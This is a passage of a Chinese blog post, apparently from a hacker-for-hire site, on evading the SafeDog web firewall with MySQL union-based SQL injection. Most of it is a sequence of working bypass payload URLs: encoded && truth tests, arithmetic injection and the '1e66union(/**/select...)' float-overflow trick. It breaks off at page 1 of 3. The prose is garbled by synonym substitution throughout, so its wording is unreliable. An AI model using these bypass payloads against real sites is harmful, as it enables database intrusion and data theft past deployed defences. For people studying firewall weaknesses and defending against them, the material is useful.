MySQL联合注入之绕过安全狗到GetShell

访客5年前黑客文章999

发现网上公开过安全狗的办法少之又少,并且根本都是给个大约点就完毕,本文章是将整个进程记录了一遍,因为一开始我也没想到我能成功的绕过去,大约进程是这样:Mysql根底有必要要有–>定位—>fuzz—>得出剖析成果–>手艺测验—>成功绕过。
网站安全狗:
面向网站安全,包含:网马扫描及查杀(自有引擎,只针对网页木马);网马自动防护功用(可自动阻拦网马 上传和拜访的动作);防SQL注入功用、防XSS跨站进犯 功用;防盗链防下载;以及避免CC进犯。 
相关代码:

测验进程
为了得到更好的测验,我写了21行的缝隙代码,用来模仿进犯,并且在本机搭建了安全狗,挑选了4.0最新版别,在测验的进程中,碰到了各式各样的阻挠,最终成功绕过了安全狗,以下是悉数进程(边写文章边绕)。
恳求 :http://127.0.0.1/1.php?id=1 and 1=1

判别是否存在SQL注入:
咱们改成http://127.0.0.1/1.php?id=1and asd #没有被拦
http://127.0.0.1/1.php?id=1 axnxd 1=1 #没有被拦
得出结论 是正则匹配
只要把asd变型 或许 把axnxd 变型即可
http://127.0.0.1/1.php?id=1 %26%26 true #真
http://127.0.0.1/1.php?id=1 %26%26 false #假
http://127.0.0.1/1.php?id=1 %26%26 1 #真
http://127.0.0.1/1.php?id=1 %26%26 0 #假

加上两点:
假如判别SQL注入并且是Int类型注入:
http://127.0.0.1/1.php?id=2-1
因为这个INT注入类型没有进行转义成INT类型
所以就能够操作加减乘除法
http://127.0.0.1/1.php?id=2-1   实际上就成了http://127.0.0.1/1.php?id=1#2减1等于1
这样成功绕过了判别是否存在SQL注入
判别字段:
Order by xx #竟然没有被拦

安全狗是昨日(2019年5月16)下载的 因为我怕自己的日志被上传到日志服务器安全人员会进行剖析 然后得出绕过安全狗的SQL句子,所以我就断网了。

进行联合注入:

变型之前首要知道要改哪个方位
http://127.0.0.1/1.php?id=1xunion(select1,2)

把注意力转换到X这个字节上。咱们能够进行fuzz。可是我个人仍是喜爱手艺一个一个挨个的试、
这儿结合了一篇老外的文章:https://medium.com/bugbountywriteup/sql-injection-in-ctf-bef1ae0c5d9b
原理便是使用INT溢出进行绕过空格



仍是被阻拦
持续变型
找出要害所在方位
http://127.0.0.1/1.php?id=1e66union(1select1,2)

要害方位在1.这个方位需求变型
http://127.0.0.1/1.php?id=1e66union((select1,2))
http://127.0.0.1/1.php?id=1e66union(/**/select1,2)
http://127.0.0.1/1.php?id=1e66union(/**/select1,2)

[1] [2] [3]  黑客接单网

相关文章

代码审计系列第二节——SQL注入

 经过第一节给咱们简略介绍了一下代码审计简略运用,那么第二节,咱们来介绍一下,使用东西和手艺进行缝隙发掘。为了咱们能对sql注入有更好的学习和收成。引荐咱们几个学习php根底的网站 Imooc.co...

TA505在最新攻击活动中使用HTML, RAT和其他技术-黑客接单平台

TA505以运用歹意垃圾邮件和不同的歹意软件来进犯金融安排和零售企业而臭名远扬。研究人员在曩昔2个月检测到与TA505相关的进犯活动。在该安排的最近活动中,运用了HTML附件来传达歹意XLS文件,XL...

8个增强 PHP 程序安全的函数

 安满是编程十分重要的一个方面。在任何一种编程言语中,都供给了许多的函数或许模块来保证程序的安全性。在现代网站运用中,常常要获取来自世界各地用户的输入,可是,咱们都知道“永久不能信任那些用户输入的数据...

根据Session的身份盗取

一、Session是什么 暗码与证书等认证手法,一般用于登录进程。用户登录之后,服务器通常会树立一个新的Session保存用户的状况和相关信息,用以盯梢用户的状况。每个Session对应一个标识符Se...

针对HTTP的躲藏攻击面剖析(中)

为了增强用户体会度,现代Web网站架构中都包含了各式各样的“躲藏体系”,这些体系不只能够给用户供给各种额定的服务,并且还能够协助管理员提取网站各方面的剖析数据。可是,这些躲藏体系相同也是近些年里常常被...

那些年挖过的SRC之我是捡漏王

输出这篇文章的意图也是为了很多人在挖洞时,看到其他大佬钱拿的不要不要的时分,只能在咱们自己自己电脑面前束手无策,这篇文章也是为了带咱们翻开新的思路。 俗话说得好,“不是你套路不行深,是你的根底不行厚...